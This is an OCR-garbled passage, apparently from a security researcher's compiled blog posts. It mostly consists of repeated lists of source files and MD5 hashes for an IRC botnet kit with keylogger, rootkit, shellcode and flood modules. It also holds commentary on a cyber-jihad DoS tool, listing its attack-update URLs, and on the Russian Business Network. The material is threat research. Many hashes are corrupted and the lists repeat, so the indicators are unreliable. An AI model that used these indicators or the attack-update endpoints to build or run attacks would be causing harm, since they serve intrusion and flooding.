fphost.h 7055501d34bd3d43850df8b62e6831e1 
ftptransfer.h 
2d7d73c876ec17d3d69a276c635400b6 
functions.h 
bda208a7b1cc247a000a356abdef36a8 
global.h 3755356ffe76d8e33b47c447c6a18949 
globals.h 
53eae556c4c592cf2cff0821437d82d1 
httpd.h 
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599d54bf6ca9d378f757c0494f729f3d 
icmpflood.h 
7cal6dd2046d8cc7c47c29acb196a5c7 
ident.h 
aeodfe404ea9350e0a38e8feef721a68 
includes.h 
cb04d0548f32d35b099efbb374elflba 
IPHIpApi.h 
d3f68e5b027ecc755ce365baael1831b7 
irc _send.h 
30d0176a5e9b6e3e5al9bfb1fcda444c 
keylogger.h 
8698c07ba01fa4ef7e8f8e865c785961 
LM.h 
2093587efdf76c2c0b69406db5383a00 
LMat.h 
5a5b035baed125ad14c6e2851d68c66d 
loaddlls.h 
14502206ad010cOcabb2c754f6a69043 
Isarestrict.h 

misc.h 
db3d2c2cfl3bae418a0bd54fdcbdcb/7f 
msn.h 
7faf693e0dfc4d8b35f40f9645d66b78 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h 0c85f5c813fald608dca7579fda3b692 
peer2peer.h 
18183485966c92b4d34fad7491fcc3ad 
processes.h 
b6532beb1cdd78e025d19e9ddf0101d7 
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protocol.h 
41¢723f4213c258e879b24aa6d173688 
psniff.h b46ffe99c732d783da321f072984f62b 
remotecmd.h 
371fb06d45888807591157d53a7de366 
ri0t.h 
cbh492b7df9b5c170d7c87527940eff3b 
rndnick.h 
947443866b24c5eel1leadfd6d19f0c08 
rootkit.h 
dal3deac13fdfdea619f405cd6b90ed9 
sandbust.h 
fc8a4024ac10b1cd82ac19405c265290 


secure.h cfdde4789e12b3b065c4879aa66a8066 


session.h 
bca52b5b5fc54e3ddab72b9d81lefe718 
shellcode.h 
a78c18fc522b485e5ed940f019b8b28a 
slimftp.h 
57980cf61ca33889db81ee866e85 7247 
startup.h 
415280488230dd24fecc8ca9eaee4439 
sysinfo.h 
71b6f4ca6b16c7cbef493f9e9e1a00b0 
tcpip.h 
c0a4a74cb1c7e286fea06f17797fc13d 
tftpd.h 
874bfd4fe931flbbb6838f6e6felecee 
threads.h 
6669b077a8ed0bc2be5196cb054f5F28 
usb.h 
2d1faf4e4bdd1a2ca108a5e20022472a 
utility.cpp 

utility.h 
4f92f365982381c988d9863491e557f8 
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visit.h 
36758dad91c6a57fca4e850290690985 
vnc.h 
091d289ad5beebf2b717054dc8dea837 
wildcard.h 
855113d59911c667289ff559fc8da328 
windns.h ec55fb42c3a5e553dbbel1bf3294a110f 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
MSNMessengerAPI.tih 
9a2d4d4cc6cf9419c99a95cd7f6ef750 
MSNMessengerAPI.tli 
f14318f48edff06d3588d3d35f2a65bb 
msnsend.cpp 
7fa851883fd38f017ff8868bcfla55fc 
msnsend.h 
bfb5a11a3d43ce4a99985fbd0859e317 
zip.cpp 
67637ea0d8f01lb31lab83f80f0eel2f8a 
zip.h 
45efde25c907cc61lafcOcfa224629b4 
build.cmd 
eb81804c8c4403f147be1a66b39268F4 
configs.h 
9d5274026688c029ead39fc13f27e9db 
jpg.ico 
0737b7da77e94cac76dc7f45ec55c33f 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
res.aps 
b7169ad8fec630f845ele7bd1cdf6b02 
res.rc 
90e49b91cc71266477ffa2292481cfac 
riOt.dsp e4e348fe738ac6e3341179910ab9a7ed 
ri0t.dsw 4dc49d4212e7aa4a6c64ad0471ec9e95 
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ri0t.ncb 22a707c2a885dc524d5d759fd445d1d3 
ri0t.opt cced226c203e8b21eb7e8103b3f2dd06 
ridt.plg 088d61d2c3098a11b6e23bc6c1a0e284 
advscan.cpp 
cfd7c9c47279fcddbaee474a6ac4eb1b 
aliaslog.cpp 
c1bb09659eaddf661b7fdc4bf68530a5 
autostart.cpp 
25b3f8f00c217d72431002fd3f6d5691 
avirus.cpp 
2ef71c653599f1166ec460a74ab6a35a 
cdkeys.cpp 
61459ee5307739fe7032c400bd48ac7c 
commands.cpp 
0653448de9d4681c3c058373d3aac357 
connect.cpp 
a5bbb9f90d5daldf55c5c8179ebc35b1 
crc32.cpp 
1d4e89b59d89256753d0fae5bbdb42e0 
crypt.cpp 
cfb3b3f77f537096900ef19c566ec4e3 
dcom2.cpp 
6cf76bcac59f22965d641aa4eca357bd 
download.cpp 
10556cb6fbb9f48a624ee29328f523b6 
driveinfo.cpp 
9c243475be978d26856cc6635f86bb79 
ehandler.cpp 
9f9d7da3463d8f5691b9348cc3c06cla 
findfile.cpp 
b63d4a4e927fe5dcd6157ce32db8be94 
firefox.cpp 
a68e8448502bd334cb4177f0becb9155 
fphost.cpp 
ef54a7e3eff16ce38d35a2c41028547f 
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ftptransfer.cpp 
b31b4ac2c575e32dee5ff22480ce5caa 
httpd.cpp 
8f71342e40a32318e562df4a8834d5f8 
icmpflood.cpp 
654732a6b37e9fed07962d3a5cadd04a 
ident.cpp 
1d066366b42c0d8950e4a25315620a45 
inject.cpp 

irc send.cpp 
074f976a815abee9b2310dc3679eb0b6 
keylogger.cpp 
6165c6e0f5bb44f31b81e86985fd9056 
loaddlls.cpp 

18f13f885cff7 1lbfle3a8cec3368dcd9 
Isarestrict.cpp 

misc.cpp 
f5a7cObf77a529c56a87407457368b20 
msn.cpp 
def7b0c3f7b281ca3b791382aea14e54 
net.cpp 
dfee8405dd08db4e766d5200355ec960 
netutils.cpp 
3e735617ab015735d0fe70fc0ed9f52b 
peer2peer.cpp 
56480044d2ccfb73a705528b07f2910a 
persist.cpp 
5890c92b5701bac5173628e6734db242 
pingudp.cpp 
48648cf75ca3a629a651f9ca65a084e8 
processes.cpp 
41229c6ac5d5df8339fab8387bc85035 
protocol.cpp 
7b4ef789a8d00565f76133d0f361bf33 
psniff.cpp 
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6d349942fa0cef6bd9583cb60fada427 
pstore.cpp 
9290499894e53868960e65d20el1flesf 
remotecmd.cpp 
126033e64c4072387887757827920244 


ridt.cop 8135d005d29c4fba538b95e0ea54fb6d 


rndnick.cpp 
70c7cd17f80187a67e925101962773f8 
rootkit.cpp 
c2d20b4d8d23e30435f58fa215841c23 
sandbust.cpp 
b4e7da4814087371a5cae7f5839b9c8b 
secure.cpp 

session.cpp 
fcdf3elcldd61a1cd9d443e05f92cd72 
shellcode.cpp 
640657f30fec7950060f13674b3fa1l71 
slimftp.cpp 
ac2913599b52a37c990e1ff69f6e5eb6 
startup.cpp 

834b0ded68dedd7d2f7 ef9fdc0937499 
sysinfo.cpp 
60c55082c1925eec02006d679441d84b 
tftpd.cpp 
60952c3eb6ce97661e0c524f31ddcc5c 
threads.cpp 
1f93967e0742c4c4a9bf27d31b87cc90 
usb.cpp 
f59be64e7c5eb59d44b40c65129f536a 
visit.cpp 
888fef0b35db7ab7f5defa499def2bc8 
vnc.cpp 
468df7caab5eac644fd767a615c72dfc 
wildcard.cpp 
6ble7c52ebccc540d3fc51clafdcO08f5 
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MSNMessengerAPI.tlh 
30f05a20f5c07326e8627dba52d66c95 
MSNMessengerAPI.tli 
034810bd2c699de10b39740a922c4a7f 
pstorec.tlh 
610fd388e03da3d5e8e311de32cf79cb 
pstorec.tli 
51d948d77a9c613a307acc67a52361a0 
commands.txt 
€241423e363897558214e8f9ba788bc9 
features.txt 
6celda23906a2ddfc214bf4fcb16158e 
Instructions.txt 
be254b9d220a40fe275d4427e485ac03 
BIN2C.COM 
1399d96e3caeaf2ecfec61e50203c585 
bot2dll.dsp 
d14bcd3eca51b45afa91d2d4aa76b7d1 
bot2dll.dsw 
3b90db1ef40755a40ca7b63b2fb8a075 
build.cmd 
6785ad24b57453564fb27b471e47da89 
dll.cpp 
7288e8e2c14fdcaa4d90b01cd8dbf760 
ext.h 
f04f77d306b9996ea3e5f56e1b642bd3 
main.cpp 46038a39e159calal9ed6aa62d7c6c9e 
advscan.h 
b039c49c0063dac8fdc56a3a323bc05f 
aliaslog.h 
5d0f2e7154fd22a548f83a7129722062 
autostart.h 
5095d41452b5b046066ed3fcd68825a8 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.h 
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1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
commands.h 
909fd90271f84f32a2055ab9b0d0ab16 
connect.h 
0099f8f502f2b1b97ee1853dd90d3c6a 
crc32.h 
1a8e23e4a21ec424d7al4cb327b5c290 
crypt.h 
bcff5ddf7b367a7f2da8137eb8d10614 
d3des.c 
71e83b68e095b59f2d50deee79d73be7 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
374abcce35a287153f59d96494b37e4c 
download.h 
47df8bad1de6fc3cf52ecaf03686d460 
driveinfo.h 
db9ec52dc459830c2282a7dealac5443 
ehandler.h 
5b68843010a35dc8539da3cb7b45c8ae2 
externs.h 
12flabe0le7e4ab4c08d52abc2e7d32f 
findfile.h 
874184ff14c51e874c744d79e133408d 
firefox.h 
cec26e3dcaf682619cf6a35fd0c5651f 
fphost.h 7055501d34bd3d43850df8b62e6831e1 
ftptransfer.h 
2d7d73c876ec17d3d69a276c635400b6 
functions.h 
bda208a7b1cc247a000a356abdef36a8 
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global.h 3755356ffe76d8e33b47c447c6a18949 
globals.h 
53eae556c4c592cf2cff0821437d82d1 
httpd.h 
599d54bf6ca9d378f757c0494f729f3d 
icmpflood.h 
7cal6dd2046d8cc7c47c29acb196a5c7 
ident.h 
ae6dfe404ea9350e0a38e8feef721a68 
includes.h 
cb04d0548f32d35b099efbb374elflba 
IPHIpApi.h 
d3f68e5b027ecc755ce365baael1831b7 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.h 
8698c07ba01fa4ef7e8f8e865c785961 
LM.h 
2093587efdf76c2c0b69406db5383a00 
LMat.h 
5a5b035baed125ad14c6e2851d68c66d 
loaddlls.h 
14502206ad010cOcabb2c754f6a69043 
Isarestrict.h 

misc.h 
db3d2c2cfl3bae418a0bd54fdcbdcb/7f 
msn.h 
7faf693e0dfc4d8b35f40f9645d66b78 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 


passwd.h 0c85f5c813fald608dca7579fda3b692 
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al-jinan.net/ntarg.php?howme=re 
al-jinan.net/tlog.php? 
al-jinan.net/tnewu.php? 
arddra.host.sk/ntarg.php 
jofpmuytrvcf.com/ntarg.php 
jo-uf.net/ntarg.php 
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Reopening the heart of e-Jihad Al-Jinan Net 


e name of God the Merciful 


fe will explain our main user in Ahjmatna against the Zionists, God 
« Mechanism of Actio 
« Our achievements 


¢ Email 


ajor Program: Program electronic Jihad 3.0 (new version) 


A special program connected to the Al-Jihad-mail, the Web programmer Bermojtah works best for the 
Btrike sites, it sans the ability of the site is complete and works iin a very strong and Is used in various 


programs battery 
oading Program S — 
« Mujahideen 
im Pri ‘am: « Infiltrators 
sali ¢ Owners quick lines 
™ . . « Jihad groups 
eo re el EF * Anti sites 


All are down, and jo-uf.net was among the domains used in the first version of the attack. If you 
think about it, even a wannabe botnet master will at least ensure the botnet’s update locations 
are properly hardcoded within the malware. More details on [13]jo-uf.net. 


Let’s discuss what cyber jihad isn’t. Cyber jihad is anything but shutting down the critical in- 
frastructure of a country in question, despite the potential for blockbuster movie scenario here. 
It’s [14]news stories like these, emphasizing on abusing the Internet medium for achieving 
their objectives in the form of recruitment, research, fund raising, propaganda, training, com- 
pared to wanting to shut it down. Logically, this is where all the investments go, because this 
is the most visible engagement point between a government and potential cyber terrorists - 
its critical infrastructure. I’m not saying don’t invest in securing it, I’m just emphasizing on the 
fact that you should balance such spendings with the pragmatic reality which can be greatly 
described by using an analogy from the malware world, and how what used to be destructive 
viruses are now the types of malware interested in abusing your data, not destroying it. 


The real threat does not come from wannabe cyber jihadists flooding a particular site in a 
coordinated manner, but from [15]Joutsourcing the entire process to those who specialize in 
the service, or providing the infrastructure for it on demand. Now that’s of course given they 
actually manage to keep up the update locations for longer than 24 hours, and achieve the 
mass effect of wannabe cyber jihadists using it all at once, the type of [16]Dark Web Cyber 
Jihad trade-off. 


1. http://ddanchev. blogspot .com/2007/01/preventing-massive-al-qaeda-cyber .htm 


2. http: //ddanchev. blogspot . com/2007/08/analyses- of-cyber-jihadist-forums-and.htm 
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peer2peer.h 
18183485966c92b4d34fad7491fcc3ad 
processes.h 
b6532beb1cdd78e025d19e9ddf0101d7 
protocol.h 
41¢723f4213c258e879b24aa6d173688 
psniff.h b46ffe99c732d783da321f072984f62b 
remotecmd.h 
371fb06d45888807591157d53a7de366 
ri0t.h 
cbh492b7df9b5c170d7c87527940eff3b 
rndnick.h 
947443866b24c5eelleadfd6d19f0c08 
rootkit.h 
dal3deac13fdfdea619f405cd6b90ed9 
sandbust.h 
fc8a4024ac10b1cd82ac19405c265290 


secure.h cfdde4789e12b3b065c4879aa66a8066 


session.h 
bca52b5b5fc54e3ddab72b9d81lefe718 
shellcode.h 
a78c18fc522b485e5ed940f019b8b28a 
slimftp.h 
57980cf61ca33889db81ee866e85 7247 
startup.h 
415280488230dd24fecc8ca9eaee4439 
sysinfo.h 
71b6f4ca6b16c7cbef493f9e9e1a00b0 
tcpip.h 
c0a4a74cb1c7e286fea06f17797fc13d 
tftpd.h 
874bfd4fe931flbbb6838f6e6felecee 
threads.h 
6669b077a8ed0bc2be5196cb054f5F28 
usb.h 
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2d1faf4e4bdd1a2ca108a5e20022472a 
utility.cpp 

utility.h 
4f92f365982381c988d9863491e557f8 
visit.h 
36758dad91c6a57fca4e850290690985 
vnc.h 
091d289ad5beebf2b717054dc8dea837 
wildcard.h 
855113d59911c667289ff559fc8da328 
windns.h ec55fb42c3a5e553dbbe1bf3294a110f 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
MSNMessengerAPI.tih 
9a2d4d4cc6cf9419c99a95cd7f6ef750 
MSNMessengerAPI.tli 
f14318f48edff06d3588d3d35f2a65bb 
msnsend.cpp 
7fa851883fd38f017ff8868bcfla55fc 
msnsend.h 
bfb5a11a3d43ce4a99985fbd0859e317 
zip.cpp 
67637ea0d8f01b31lab83f80f0eel2f8a 
zip.h 
45efde25c907cc61lafcOcfa224629b4 
build.cmd 
eb81804c8c4403f147be1a66b39268Ff4 
configs.h 
a2938dfec4001b8691d6e6a8e8a80b31 
jpg.ico 
0737b7da77e94cac76dc7f45ec55c33f 
README!!!.txt 
cfe278defdf4009d218a960610a811d1 
res.rc 
90e49b91cc71266477ffa2292481cfac 
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ridt.dsp 90a45b800eb0caca04916f339534f5f7 
ridt.dsw 4dc49d4212e7aa4a6c64ad0471ec9e95 


advscan.cpp 
cfd7c9c47279fcddbaee474a6ac4eb1b 
aliaslog.cpp 
cl1bb09659eaddf661b7fdc4bf68530a5 
autostart.cpp 
25b3f8f00cC217d72431002fd3f6d5691 
avirus.cpp 
2ef71c653599f1166ec460a74ab6a35a 
cdkeys.cpp 
8a8a80efa80ae8b8605fff558a3683bb 
commands.cpp 
fe64cf50bfbf27f41ac407e7c883fce6 
connect.cpp 
76¢c877a99b223bcd2d7fcba7844aa298 
crc32.cpp 
1d4e89b59d89256753d0fae5bbdb42e0 
crypt.cpp 
cfo3b3f77f537096900ef19c566ec4e3 
dcom2.cpp 
6cf76bcac59f22965d641aa4eca357bd 
download.cpp 
f226a9edaff257flae9e2a094e2bb878 
driveinfo.cpp 
9c243475be978d26856cc6635f86bb79 
ehandler.cpp 
9f9d7da3463d8f5691b9348cc3c06cla 
findfile.cpp 
b63d4a4e927fe5dcd6157ce32db8be94 
firefox.cpp 
a68e8448502bd334cb4177f0becb9155 
fphost.cpp 
ef54a7e3eff16ce38d35a2c41028547f 
ftptransfer.cpp 
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b31b4ac2c575e32dee5ff22480ce5caa 
httpd.cpp 
8f71342e40a32318e562df4a8834d5f8 
icmpflood.cpp 
2cc1e263573ba9705ec22e8f282b640d 
ident.cpp 
1d066366b42c0d8950e4a25315620a45 
inject.cpp 

irc send.cpp 
074f976a815abee9b2310dc3679eb0b6 
keylogger.cpp 
6165c6e0f5bb44f31b81e86985fd9056 
loaddlls.cpp 
3d36db1f081526ab6b34a399ee70098c 
Isarestrict.cpp 
c4023717ee4270871e00c98bc357437d 
misc.cpp f5a7cObf77a529c56a87407457368b20 
net.cpp 
dfee8405dd08db4e766d5200355ec960 
netutils.cpp 
99c3clbed1c440468d10eb92d2f51b51 
peer2peer.cpp 
7f2c09d554e53cc401e9dd8da637d77c 
persist.cpp 
5890c92b5701bac5173628e6734db242 
pingudp.cpp 
48648cf75ca3a629a651f9ca65a084e8 
processes.cpp 
2aa4d98c44d1dfflbf7fl3fab7b94fal 
protocol.cpp 
dd5f893cd41f13ae525c84ae21d91708 
psniff.cpp 
81490420e961ed7f5ee2ce606b097d19 
pstore.cpp 
693f9defla4edfbdaeacedc33c46adf3 
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remotecmd.cpp 
126033e64c4072387887757827920244 


ridt.cpop 805747644bb30404a80437047b0e93ce 


rndnick.cpp 
70c7cd17f80187a67e925101962773f8 
rootkit.cpp 
c2d20b4d8d23e30435f58fa215841c23 
sandbust.cpp 
b4e7da4814087371a5cae7f5839b9c8b 
secure.cpp 
1b41ff18d4ae0ef0984e9f079e248ce5 
session.cpp 
fcdf3elcldd61a1cd9d443e05f92cd72 
shellcode.cpp 
640657f30fec7950060f13674b3fa171 
slimftp.cpp 
ac2913599b52a37c990e1ff69f6e5eb6 
startup.cpp 
a4ff4cfaebdac4324ab7fd79afcb3ca4 
sysinfo.cpp 
60c55082c1925eec02006d679441d84b 
tftpd.cpp 
60952c3eb6ce97661e0c524f31ddcc5c 
threads.cpp 
e90cfb732e485a55a5c2b0c22d21160a 
usb.cpp 
f59be64e7c5eb59d44b40c65129f536a 
visit.cpp 
8131f39ac0O1d5aea64da85f4861c203c 
vnc.cpp 
468df7caab5eac644fd767a615c72dfc 
wildcard.cpp 
6ble7c52ebccc540d3fc51clafdc08f5 
commands.txt 
€241423e363897558214e8f9ba788bc9 
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features.txt 
6celda23906a2ddfc214bf4fcb16158e 
Instructions.txt 
be254b9d220a40fe275d4427e485ac03 
BIN2C.COM 
1399d96e3caeaf2ecfec61e50203c585 
bot2dll.dsp 
d14bcd3eca51b45afa91d2d4aa76b7d1 
bot2dll.dsw 
3b90db1ef40755a40ca7b63b2fb8a075 
build.cmd 
6785ad24b57453564fb27b471e47da89 
dll.cpp 
7288e8e2c14fdcaa4d90b01cd8dbf760 
ext.h 
f04F77d306b9996ea3e5f56e1b642bd3 
main.cpp 46038a39e159calal9ed6aa62d7c6c9e 
advscan.h 
b039c49c0063dac8fdc56a3a323bc05f 
aliaslog.h 
5d0f2e7154fd22a548f83a7129722062 
autostart.h 
5095d41452b5b046066ed3fcd68825a8 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
commands.h 
909fd90271f84f32a2055ab9b0d0ab16 
connect.h 
0099f8f502f2b1b97ee1853dd90d3c6a 
crc32.h 
1a8e23e4a21ec424d7a14cb327b5c290 
crypt.h 
bcff5ddf7b367a7f2da8137eb8d10614 
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d3des.c 
71e83b68e095b59f2d50deee79d73be7 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
136b6c972b21a9002d6353ebe5c3caa4b 
download.h 
47df8bad1de6fc3cf52ecaf03686d460 
driveinfo.h 
db9ec52dc459830c2282a7dealac5443 
ehandler.h 
5b8843010a35dc8539da3cb7b45c8ae2 
externs.h 
aff70ec943a899886d3f647ce0c053b6 
findfile.h 
874184ff14c51e874c744d79e133408d 
firefox.h 
cec26e3dcaf682619cf6a35fd0c5651f 
fphost.h 7055501d34bd3d43850df8b62e6831e1 
ftptransfer.h 
2d7d73c876ec17d3d69a276c635400b6 
functions.h 
bda208a7b1cc247a000a356abdef36a8 
global.h 3755356ffe76d8e33b47c447c6a18949 
globals.h 
9852184c3a4f34be8f389776d02a19b8 
httpd.h 
599d54bf6ca9d378f757c0494f729f3d 
icmpflood.h 
7cal6dd2046d8cc7c47c29acb196a5c7 
ident.h 
ae6dfe404ea9350e0a38e8feef721a68 


includes.h 


11629 


558272a6be293972c373260a70626186 
IPHIpApi.h 
d3f68e5b027ecc755ce365baael1831b7 
irc _send.h 
d12c03479f2601d8e9f4d4331424b0d6 
keylogger.h 
8698c07ba01fa4ef7e8f8e865c785961 
LM.h 
2093587efdf76c2c0b69406db5383a00 
LMat.h 
5a5b035baed125ad14c6e2851d68c66d 
loaddlls.h 
14502206ad010cOcabb2c754f6a69043 
Isarestrict.h 
85da7a61464785c33c70e31b84c3a45a 
misc.h 
db3d2c2cfl3bae418a0bd54fdcbdcb/7f 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h 0c85f5c813fald608dca7579fda3b692 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
processes.h 
b6532beb1cdd78e025d19e9ddf0101d7 
protocol.h 
41¢723f4213c258e879b24aa6d173688 
psniff.h b46ffe99c732d783da321f072984f62b 
remotecmd.h 
371fb06d45888807591157d53a7de366 
ri0t.h 
cb492b7df9b5c170d7c87527940eff3b 
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rndnick.h 

947443866b24c5eelleadfd6d19f0c08 

rootkit.h 

dal3deac13fdfdea619f405cd6b90ed9 
sandbust.h 
fc8a4024ac10b1cd82ac19405c265290 

secure.h cfdde4789e12b3b065c4879aa66a8066 


session.h 
bca52b5b5fc54e3ddab72b9d81lefe718 
shellcode.h 
a78c18fc522b485e5ed940f019b8b28a 
slimftp.h 
57980cf61ca33889db81ee866e857247 
startup.h 
415280488230dd24fecc8ca9eaee4439 
sysinfo.h 
71b6f4ca6b16c7cbef493f9e9e1a00b0 
tcpip.h 
c0a4a74cb1c7e286fea06f17797fc13d 
tftpd.h 
874bfd4fe931flbbb6838f6e6felecee 
threads.h 
6669b077a8ed0bc2be5196cb054f5F28 
usb.h 
2d1faf4e4bdd1a2cal108a5e20022472a 
utility.cpp 

utility.h 
4f92f365982381c988d9863491e557f8 
visit. 
36758dad91c6a57fca4e850290690985 
vnc.h 
091d289ad5beebf2b717054dc8dea837 
wildcard.h 


855113d59911c667289ff559fc8da328 


windns.h ec55fb42c3a5e553dbbel1bf3294a110f 
11631 


MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
MSNMessengerAPI.tlh 
9a2d4d4cc6cf9419c99a95cd7f6ef750 
MSNMessengerAPI.tli 
f14318f48edff06d3588d3d35f2a65bb 
msnsend.cpp 
7fa851883fd38f017ff8868bcfla55fc 
msnsend.h 
bfb5a11a3d43ce4a99985fbd0859e317 
zip.cpp 

67637ea0d8f01b31lab83f80f0eel2f8a 

zip.h 

45efde25c907cc61lafcOcfa224629b4 
build.cmd 
eb81804c8c4403f147be1a66b39268f4 
configs.h 
a2938dfec4001b8691d6e6a8e8a80b31 
jpg.ico 

0737b7da77e94cac76dc7f45ec55c33f 
README!!!.txt 
cfe278defdf4009d218a960610a811d1 

res.rc 

90e49b91cc71266477ffa2292481cfac 
ridt.dsp 90a45b800eb0caca04916f339534f5f7 
ri0t.dsw 4dc49d4212e7aa4a6c64ad0471ec9e95 
ri0t.ncb cfd04a50460c2d088db06cb82dfbf29c 
riOt.opt 737f56e9f13749eldfe3fc06b305ab72 
advscan.cpp 
cfd7c9c47279fcddbaee474a6ac4eb1b 
aliaslog.cpp 
clbb09659eaddf661b7fdc4bf68530a5 
autostart.cpp 
25b3f8f00c217d72431002fd3f6d5691 
avirus.cpp 
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http: //ddanchev. blogspot .com/2006/10/scada-security-incidents-and-critical .htm 


http: //ddanchev. blogspot .com/2007/08/cyber-jihadist-dos-tool.htm 

http: //www.scmagazine.com/uk/news/article/764556/website-al-qaeda-cyber-jihad-begin-nov-11/ 
_http:/ /ueblog. infovorld. con/robertxcrngely/archives/2007/11/cyber_terrorisn ht) 
_kttp://av.forneus.con/story/0, 2888, 307603 ,00:ntml 

_ http: / enw, itbusinessedge.con/blogs/haw/7p-1194 

_http://adanchey. blogspot con/2007/10/peoples~ inforeation~varFare-concept “tal 


. http: //warintel .blogspot.com/2007/11/al-jinannet-is-back.htm 


11. http: //ddanchev.blogspot.com/2007/10/peoples-information-warfare-concept.htm 
. bttp://72.14.209.104/search?hl=enkq=cache/3Awww.al-jinan.net 
. http://terroronline.wordpress.com/2006/11/01/the-electronic- jihad-that-wasnt/ 


14. http: //www.timesonline.co.uk/tol/news/uk/crime/article2821101.ece 
15. http: //ddanchev.blogspot.com/2007/10/botnet- on-demand-service.htm 


. http: //ddanchev.blogspot .com/2007/09/dark-web-and-cyber- jihad. htm 


Report for AS40989 


Name 
RBN-AS RBusiness Network 
NOT Announced 


This AS is not currently used to announce prefixes in the global routing, table, nor is it used as a visible transit AS 


Prefixes ackled and withdrawn by this origin AS in the past 7 days 


as-report v4.0 (gih) 1 3/06/07 


Yesterday, [1]Paul Ferguson tipped [2]me on the [3]sudden disappearance of the [4]Russian 
Business Network. And just like babies have different understanding of day and night, the RBN 
isn’t interested in going to sleep too, in fact there’s a speculation that [5]they’re relocating 
their infrastructure to China, speculation in terms of that it could be another such localized 
RBN operation : 
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2ef71c653599f1166ec460a74ab6a35a 
cdkeys.cpp 
8a8a80efa80ae8b8605fff558a3683bb 
commands.cpp 
fe64cf50bfbf27f41ac407e7c883fce6 
connect.cpp 
76c877a99b223bcd2d7fcba7844aa298 
crc32.cpp 
1d4e89b59d89256753d0fae5bbdb42e0 
crypt.cpp 
cfb3b3f77f537096900ef19c566ec4e3 
dcom2.cpp 
6cf76bcac59f22965d641aa4eca357bd 
download.cpp 
f226a9edaff257flae9e2a094e2bb878 
driveinfo.cpp 
9c243475be978d26856cc6635f86bb79 
ehandler.cpp 
9f9d7da3463d8f5691b9348cc3c06cla 
findfile.cpp 
b63d4a4e927fe5dcd6157ce32db8be94 
firefox.cpp 
a68e8448502bd334cb4177f0becb9155 
fphost.cpp 
ef54a7e3eff16ce38d35a2c41028547f 
ftptransfer.cpp 
b31b4ac2c575e32dee5ff22480ce5caa 
httpd.cpp 
8f71342e40a32318e562df4a8834d5f8 
icmpflood.cpp 
2cc1e263573ba9705ec22e8f282b640d 
ident.cpp 
1d066366b42c0d8950e4a25315620a45 
inject.cpp 
irc send.cpp 
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074f976a815abee9b2310dc3679eb0b6 
keylogger.cpp 
6165c6e0f5bb44f31b81e86985fd9056 
loaddlls.cpp 
3d36db1f081526ab6b34a399ee70098c 
Isarestrict.cpp 
c4023717ee4270871e00c98bc357437d 
misc.cpp f5a7cObf77a529c56a87407457368b20 
net.cpp 
dfee8405dd08db4e766d5200355ec960 
netutils.cpp 
99c3clbed1c440468d10eb92d2f51b51 
peer2peer.cpp 
7f2c09d554e53cc401e9dd8da637d77c 
persist.cpp 
5890c92b5701bac5173628e6734db242 
pingudp.cpp 
48648cf75ca3a629a651f9ca65a084e8 
processes.cpp 
2aa4d98c44d1dfflbf7fl3fab7b94fal 
protocol.cpp 
dd5f893cd41f13ae525c84ae21d91708 
psniff.cpp 
81490420e961ed7f5ee2ce606b097d19 
pstore.cpp 
693f9defla4edfbdaeacedc33c46adf3 
remotecmd.cpp 
126033e64c4072387887757827920244 
ri0t.cpp 805747644bb30404a80437047b0e93ce 
rndnick.cpp 
70c7cd17f80187a67e925101962773f8 
rootkit.cpp 
c2d20b4d8d23e30435f58fa215841c23 
sandbust.cpp 
b4e7da4814087371a5cae7f5839b9c8b 
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secure.cpp 
1b41ff18d4ae0ef0984e9f079e248ce5 
session.cpp 
fcdf3elcldd61a1cd9d443e05f92cd72 
shellcode.cpp 
640657f30fec7950060f13674b3fa171 
slimftp.cpp 
ac2913599b52a37c990e1ff69f6e5eb6 
startup.cpp 
a4ff4cfaebdac4324ab7fd79afcb3ca4 
sysinfo.cpp 
60c55082c1925eec02006d679441d84b 
tftpd.cpp 
60952c3eb6ce97661e0c524f31ddcc5c 
threads.cpp 
e90cfb732e485a55a5c2b0c22d21160a 
usb.cpp 
f59be64e7c5eb59d44b40c65129f536a 
visit.cpp 
8131f39ac0O1d5aea64da85f4861c203c 
vnc.cpp 
468df7caab5eac644fd767a615c72dfc 
wildcard.cpp 
6ble7c52ebccc540d3fc51clafdcO8f5 
MSNMessengerAPI.tlh 
ba8492ce3a91a12d9345cac30a2dbd03 
MSNMessengerAPI.tli 
Od09abead9aad793f0d7e4d154bf2acb 
pstorec.tlh 
8ee375a81d25d85fd5a05f0167961ed0 
pstorec.tli 
af8b013262c77a15b93cbf56eea81729 
commands.txt 
€241423e363897558214e8f9ba788bc9 


features.txt 
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6celda23906a2ddfc214bf4fcb16158e 
Instructions.txt 
be254b9d220a40fe275d4427e485ac03 
BIN2C.COM 
1399d96e3caeaf2ecfec61e50203c585 
bot2dll.dsp 
d14bcd3eca51b45afa91d2d4aa76b7d1 
bot2dll.dsw 
3b90db1ef40755a40ca7b63b2fb8a075 
build.cmd 
6785ad24b57453564fb27b471e47da89 
dil.cpp 
7288e8e2c14fdcaa4d90b01cd8dbf760 
ext.h 
f04f77d306b9996ea3e5f56e1b642bd3 
main.cpp 46038a39e159calal9ed6aa62d7c6c9e 
advscan.h 
b039c49c0063dac8fdc56a3a323bc05f 
aliaslog.h 
